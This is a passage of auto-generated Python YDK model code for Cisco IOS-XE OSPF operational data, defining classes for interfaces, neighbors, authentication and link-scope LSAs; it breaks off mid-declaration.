(YLeaf(YType.str, 'dr'), ['str','str'])), ('bdr', (YLeaf(YType.str, 'bdr'), ['str','str'])), ('priority', (YLeaf(YType.uint8, 'priority'), ['int'])), ]) self.name = None self.network_type = None self.passive = None self.demand_circuit = None self.node_flag = None self.cost = None self.hello_interval = None self.dead_interval = None self.retransmit_interval = None self.transmit_delay = None self.mtu_ignore = None self.lls = None self.prefix_suppression = None self.bfd = None self.enable = None self.state = None self.hello_timer = None self.wait_timer = None self.dr = None self.bdr = None self.priority = None self.multi_area = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.MultiArea() self.multi_area.parent = self self._children_name_map["multi_area"] = "multi-area" self.fast_reroute = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.FastReroute() self.fast_reroute.parent = self self._children_name_map["fast_reroute"] = "fast-reroute" self.ttl_security = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.TtlSecurity() self.ttl_security.parent = self self._children_name_map["ttl_security"] = "ttl-security" self.authentication = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.Authentication() self.authentication.parent = self self._children_name_map["authentication"] = "authentication" self.static_neighbor = YList(self) self.ospf_neighbor = YList(self) self.intf_link_scope_lsas = YList(self) self.intf_multi_topology = YList(self) self._segment_path = lambda: "ospf-interface" + "[name='" + str(self.name) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface, ['name', 'network_type', 'passive', 'demand_circuit', 'node_flag', 'cost', 'hello_interval', 'dead_interval', 'retransmit_interval', 'transmit_delay', 'mtu_ignore', 'lls', 'prefix_suppression', 'bfd', 'enable', 'state', 'hello_timer', 'wait_timer', 'dr', 'bdr', 'priority'], name, value) class MultiArea(Entity): """ Multi Area .. attribute:: multi_area_id Multi\-area ID **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: cost Interface cost for multi\-area **type**\: int **range:** 0..65535 **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.MultiArea, self).__init__() self.yang_name = "multi-area" self.yang_parent_name = "ospf-interface" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('multi_area_id', (YLeaf(YType.uint32, 'multi-area-id'), ['int'])), ('cost', (YLeaf(YType.uint16, 'cost'), ['int'])), ]) self.multi_area_id = None self.cost = None self._segment_path = lambda: "multi-area" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.MultiArea, ['multi_area_id', 'cost'], name, value) class StaticNeighbor(Entity): """ Staticly configured neighbors .. attribute:: address (key) Neighbor IP address **type**\: union of the below types: **type**\: str **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)? **type**\: str **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)? **config**\: False .. attribute:: cost Neighbor cost **type**\: int **range:** 0..65535 **config**\: False .. attribute:: poll_interval Neighbor polling intervali in seconds **type**\: int **range:** 0..65535 **config**\: False **units**\: seconds """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.StaticNeighbor, self).__init__() self.yang_name = "static-neighbor" self.yang_parent_name = "ospf-interface" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['address'] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('address', (YLeaf(YType.str, 'address'), ['str','str'])), ('cost', (YLeaf(YType.uint16, 'cost'), ['int'])), ('poll_interval', (YLeaf(YType.uint16, 'poll-interval'), ['int'])), ]) self.address = None self.cost = None self.poll_interval = None self._segment_path = lambda: "static-neighbor" + "[address='" + str(self.address) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.StaticNeighbor, ['address', 'cost', 'poll_interval'], name, value) class FastReroute(Entity): """ Fast reroute config .. attribute:: candidate_disabled Prevent the interface to be used as backup **type**\: bool **config**\: False .. attribute:: enabled Activates LFA. This model assumes activation of per\-prefix LFA **type**\: bool **config**\: False .. attribute:: remote_lfa_enabled Activates remote LFA **type**\: bool **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.FastReroute, self).__init__() self.yang_name = "fast-reroute" self.yang_parent_name = "ospf-interface" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('candidate_disabled', (YLeaf(YType.boolean, 'candidate-disabled'), ['bool'])), ('enabled', (YLeaf(YType.boolean, 'enabled'), ['bool'])), ('remote_lfa_enabled', (YLeaf(YType.boolean, 'remote-lfa-enabled'), ['bool'])), ]) self.candidate_disabled = None self.enabled = None self.remote_lfa_enabled = None self._segment_path = lambda: "fast-reroute" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.FastReroute, ['candidate_disabled', 'enabled', 'remote_lfa_enabled'], name, value) class TtlSecurity(Entity): """ TTL security .. attribute:: enabled Enable/Disable TTL security check **type**\: bool **config**\: False .. attribute:: hops Maximum number of hops that a OSPF packet may have traveled **type**\: int **range:** 0..255 **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.TtlSecurity, self).__init__() self.yang_name = "ttl-security" self.yang_parent_name = "ospf-interface" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('enabled', (YLeaf(YType.boolean, 'enabled'), ['bool'])), ('hops', (YLeaf(YType.uint8, 'hops'), ['int'])), ]) self.enabled = None self.hops = None self._segment_path = lambda: "ttl-security" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.TtlSecurity, ['enabled', 'hops'], name, value) class Authentication(Entity): """ Authentication configuration .. attribute:: sa SA name **type**\: str **config**\: False .. attribute:: key_chain key\-chain name **type**\: str **config**\: False .. attribute:: key_string Key string in ASCII format **type**\: str **config**\: False .. attribute:: crypto_algorithm_val Crypto algorithm **type**\: :py:class:`CryptoAlgorithmVal <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.Authentication.CryptoAlgorithmVal>` **config**\: False .. attribute:: no_auth No authentication enabled **type**\: int **range:** 0..4294967295 **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.Authentication, self).__init__() self.yang_name = "authentication" self.yang_parent_name = "ospf-interface" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([("crypto-algorithm-val", ("crypto_algorithm_val", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.Authentication.CryptoAlgorithmVal))]) self._leafs = OrderedDict([ ('sa', (YLeaf(YType.str, 'sa'), ['str'])), ('key_chain', (YLeaf(YType.str, 'key-chain'), ['str'])), ('key_string', (YLeaf(YType.str, 'key-string'), ['str'])), ('no_auth', (YLeaf(YType.uint32, 'no-auth'), ['int'])), ]) self.sa = None self.key_chain = None self.key_string = None self.no_auth = None self.crypto_algorithm_val = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.Authentication.CryptoAlgorithmVal() self.crypto_algorithm_val.parent = self self._children_name_map["crypto_algorithm_val"] = "crypto-algorithm-val" self._segment_path = lambda: "authentication" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.Authentication, ['sa', 'key_chain', 'key_string', 'no_auth'], name, value) class CryptoAlgorithmVal(Entity): """ Crypto algorithm .. attribute:: hmac_sha1_12 HMAC\-SHA1\-12 algorithm **type**\: :py:class:`Empty<ydk.types.Empty>` **config**\: False .. attribute:: hmac_sha1_20 HMAC\-SHA1\-20 algorithm **type**\: :py:class:`Empty<ydk.types.Empty>` **config**\: False .. attribute:: md5 MD5 algorithm **type**\: :py:class:`Empty<ydk.types.Empty>` **config**\: False .. attribute:: sha_1 SHA\-1 algorithm **type**\: :py:class:`Empty<ydk.types.Empty>` **config**\: False .. attribute:: hmac_sha_1 HMAC\-SHA\-1 authentication algorithm **type**\: :py:class:`Empty<ydk.types.Empty>` **config**\: False .. attribute:: hmac_sha_256 HMAC\-SHA\-256 authentication algorithm **type**\: :py:class:`Empty<ydk.types.Empty>` **config**\: False .. attribute:: hmac_sha_384 HMAC\-SHA\-384 authentication algorithm **type**\: :py:class:`Empty<ydk.types.Empty>` **config**\: False .. attribute:: hmac_sha_512 HMAC\-SHA\-512 authentication algorithm **type**\: :py:class:`Empty<ydk.types.Empty>` **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.Authentication.CryptoAlgorithmVal, self).__init__() self.yang_name = "crypto-algorithm-val" self.yang_parent_name = "authentication" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('hmac_sha1_12', (YLeaf(YType.empty, 'hmac-sha1-12'), ['Empty'])), ('hmac_sha1_20', (YLeaf(YType.empty, 'hmac-sha1-20'), ['Empty'])), ('md5', (YLeaf(YType.empty, 'md5'), ['Empty'])), ('sha_1', (YLeaf(YType.empty, 'sha-1'), ['Empty'])), ('hmac_sha_1', (YLeaf(YType.empty, 'hmac-sha-1'), ['Empty'])), ('hmac_sha_256', (YLeaf(YType.empty, 'hmac-sha-256'), ['Empty'])), ('hmac_sha_384', (YLeaf(YType.empty, 'hmac-sha-384'), ['Empty'])), ('hmac_sha_512', (YLeaf(YType.empty, 'hmac-sha-512'), ['Empty'])), ]) self.hmac_sha1_12 = None self.hmac_sha1_20 = None self.md5 = None self.sha_1 = None self.hmac_sha_1 = None self.hmac_sha_256 = None self.hmac_sha_384 = None self.hmac_sha_512 = None self._segment_path = lambda: "crypto-algorithm-val" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.Authentication.CryptoAlgorithmVal, ['hmac_sha1_12', 'hmac_sha1_20', 'md5', 'sha_1', 'hmac_sha_1', 'hmac_sha_256', 'hmac_sha_384', 'hmac_sha_512'], name, value) class OspfNeighbor(Entity): """ List of OSPF neighbors .. attribute:: neighbor_id (key) OSPF neighbor ID **type**\: union of the below types: **type**\: str **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)? **type**\: str **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)? **config**\: False .. attribute:: address Neighbor address **type**\: union of the below types: **type**\: str **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)? **type**\: str **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)? **config**\: False .. attribute:: dr Designated Router **type**\: union of the below types: **type**\: str **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)? **type**\: str **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)? **config**\: False .. attribute:: bdr Backup Designated Router **type**\: union of the below types: **type**\: str **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)? **type**\: str **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)? **config**\: False .. attribute:: state OSPF neighbor state **type**\: :py:class:`NbrStateType <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.NbrStateType>` **config**\: False .. attribute:: stats Per\-neighbor statistics **type**\: :py:class:`Stats <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.OspfNeighbor.Stats>` **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.OspfNeighbor, self).__init__() self.yang_name = "ospf-neighbor" self.yang_parent_name = "ospf-interface" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['neighbor_id'] self._child_classes = OrderedDict([("stats", ("stats", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.OspfNeighbor.Stats))]) self._leafs = OrderedDict([ ('neighbor_id', (YLeaf(YType.str, 'neighbor-id'), ['str','str'])), ('address', (YLeaf(YType.str, 'address'), ['str','str'])), ('dr', (YLeaf(YType.str, 'dr'), ['str','str'])), ('bdr', (YLeaf(YType.str, 'bdr'), ['str','str'])), ('state', (YLeaf(YType.enumeration, 'state'), [('ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper', 'NbrStateType', '')])), ]) self.neighbor_id = None self.address = None self.dr = None self.bdr = None self.state = None self.stats = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.OspfNeighbor.Stats() self.stats.parent = self self._children_name_map["stats"] = "stats" self._segment_path = lambda: "ospf-neighbor" + "[neighbor-id='" + str(self.neighbor_id) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.OspfNeighbor, ['neighbor_id', 'address', 'dr', 'bdr', 'state'], name, value) class Stats(Entity): """ Per\-neighbor statistics .. attribute:: nbr_event_count The number of time this neighbor has changed state or an error has occurred **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: nbr_retrans_qlen The current length of the retransmission queue **type**\: int **range:** 0..4294967295 **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.OspfNeighbor.Stats, self).__init__() self.yang_name = "stats" self.yang_parent_name = "ospf-neighbor" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('nbr_event_count', (YLeaf(YType.uint32, 'nbr-event-count'), ['int'])), ('nbr_retrans_qlen', (YLeaf(YType.uint32, 'nbr-retrans-qlen'), ['int'])), ]) self.nbr_event_count = None self.nbr_retrans_qlen = None self._segment_path = lambda: "stats" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.OspfNeighbor.Stats, ['nbr_event_count', 'nbr_retrans_qlen'], name, value) class IntfLinkScopeLsas(Entity): """ List OSPF link scope LSAs .. attribute:: lsa_type (key) OSPF link scope LSA type **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: link_scope_lsa List of OSPF link scope LSAs **type**\: list of :py:class:`LinkScopeLsa <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa>` **config**\: False .. attribute:: area_scope_lsa List OSPF area scope LSA databases **type**\: list of :py:class:`AreaScopeLsa <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa>` **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas, self).__init__() self.yang_name = "intf-link-scope-lsas" self.yang_parent_name = "ospf-interface" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['lsa_type'] self._child_classes = OrderedDict([("link-scope-lsa", ("link_scope_lsa", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa)), ("area-scope-lsa", ("area_scope_lsa", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa))]) self._leafs = OrderedDict([ ('lsa_type', (YLeaf(YType.uint32, 'lsa-type'), ['int'])), ]) self.lsa_type = None self.link_scope_lsa = YList(self) self.area_scope_lsa = YList(self) self._segment_path = lambda: "intf-link-scope-lsas" + "[lsa-type='" + str(self.lsa_type) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas, ['lsa_type'], name, value) class LinkScopeLsa(Entity): """ List of OSPF link scope LSAs .. attribute:: lsa_id (key) LSA ID **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: adv_router (key) Advertising router **type**\: union of the below types: **type**\: str **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)? **type**\: str **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)? **config**\: False .. attribute:: decoded_completed The OSPF LSA body is fully decoded **type**\: bool **config**\: False .. attribute:: raw_data The complete LSA in network byte order as received/sent over the wire **type**\: list of int **range:** 0..255 **config**\: False .. attribute:: version Version **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: ospfv2_lsa OSPFv2 LSA **type**\: :py:class:`Ospfv2Lsa <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Lsa>` **config**\: False .. attribute:: ospfv2_link OSPFv2 LSA link **type**\: list of :py:class:`Ospfv2Link <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Link>` **config**\: False .. attribute:: ospfv2_topology Summary LSA **type**\: list of :py:class:`Ospfv2Topology <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Topology>` **config**\: False .. attribute:: ospfv2_external External LSA **type**\: list of :py:class:`Ospfv2External <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2External>` **config**\: False .. attribute:: ospfv2_unknown_tlv OSPFv2 Unknown TLV **type**\: list of :py:class:`Ospfv2UnknownTlv <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2UnknownTlv>` **config**\: False .. attribute:: ospfv3_lsa_val OSPFv3 LSA **type**\: :py:class:`Ospfv3LsaVal <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal>` **config**\: False .. attribute:: ospfv3_link OSPFv3 links **type**\: list of :py:class:`Ospfv3Link <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3Link>` **config**\: False .. attribute:: ospfv3_prefix_list OSPFv3 prefix\-list **type**\: list of :py:class:`Ospfv3PrefixList <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3PrefixList>` **config**\: False .. attribute:: ospfv3_ia_prefix OSPFv3 intra\-area prefix\-list **type**\: list of :py:class:`Ospfv3IaPrefix <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3IaPrefix>` **config**\: False .. attribute:: multi_topology OSPF multi\-topology interface augmentation **type**\: list of :py:class:`MultiTopology <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.MultiTopology>` **config**\: False .. attribute:: router_address Router address **type**\: union of the below types: **type**\: str **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)? **type**\: str **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)? **config**\: False .. attribute:: tlv Link TLV **type**\: :py:class:`Tlv <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Tlv>` **config**\: False .. attribute:: unknown_sub_tlv OSPFv2 Unknown sub TLV **type**\: list of :py:class:`UnknownSubTlv <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.UnknownSubTlv>` **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa, self).__init__() self.yang_name = "link-scope-lsa" self.yang_parent_name = "intf-link-scope-lsas" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['lsa_id','adv_router'] self._child_classes = OrderedDict([("ospfv2-lsa", ("ospfv2_lsa", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Lsa)), ("ospfv2-link", ("ospfv2_link", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Link)), ("ospfv2-topology", ("ospfv2_topology", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Topology)), ("ospfv2-external", ("ospfv2_external", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2External)), ("ospfv2-unknown-tlv", ("ospfv2_unknown_tlv", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2UnknownTlv)), ("ospfv3-lsa-val", ("ospfv3_lsa_val", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal)), ("ospfv3-link", ("ospfv3_link", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3Link)), ("ospfv3-prefix-list", ("ospfv3_prefix_list", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3PrefixList)), ("ospfv3-ia-prefix", ("ospfv3_ia_prefix", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3IaPrefix)), ("multi-topology", ("multi_topology", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.MultiTopology)), ("tlv", ("tlv", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Tlv)), ("unknown-sub-tlv", ("unknown_sub_tlv", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.UnknownSubTlv))]) self._leafs = OrderedDict([ ('lsa_id', (YLeaf(YType.uint32, 'lsa-id'), ['int'])), ('adv_router', (YLeaf(YType.str, 'adv-router'), ['str','str'])), ('decoded_completed', (YLeaf(YType.boolean, 'decoded-completed'), ['bool'])), ('raw_data', (YLeafList(YType.uint8, 'raw-data'), ['int'])), ('version', (YLeaf(YType.uint32, 'version'), ['int'])), ('router_address', (YLeaf(YType.str, 'router-address'), ['str','str'])), ]) self.lsa_id = None self.adv_router = None self.decoded_completed = None self.raw_data = [] self.version = None self.router_address = None self.ospfv2_lsa = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Lsa() self.ospfv2_lsa.parent = self self._children_name_map["ospfv2_lsa"] = "ospfv2-lsa" self.ospfv3_lsa_val = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal() self.ospfv3_lsa_val.parent = self self._children_name_map["ospfv3_lsa_val"] = "ospfv3-lsa-val" self.tlv = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Tlv() self.tlv.parent = self self._children_name_map["tlv"] = "tlv" self.ospfv2_link = YList(self) self.ospfv2_topology = YList(self) self.ospfv2_external = YList(self) self.ospfv2_unknown_tlv = YList(self) self.ospfv3_link = YList(self) self.ospfv3_prefix_list = YList(self) self.ospfv3_ia_prefix = YList(self) self.multi_topology = YList(self) self.unknown_sub_tlv = YList(self) self._segment_path = lambda: "link-scope-lsa" + "[lsa-id='" + str(self.lsa_id) + "']" + "[adv-router='" + str(self.adv_router) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa, ['lsa_id', 'adv_router', 'decoded_completed', 'raw_data', 'version', 'router_address'], name, value) class 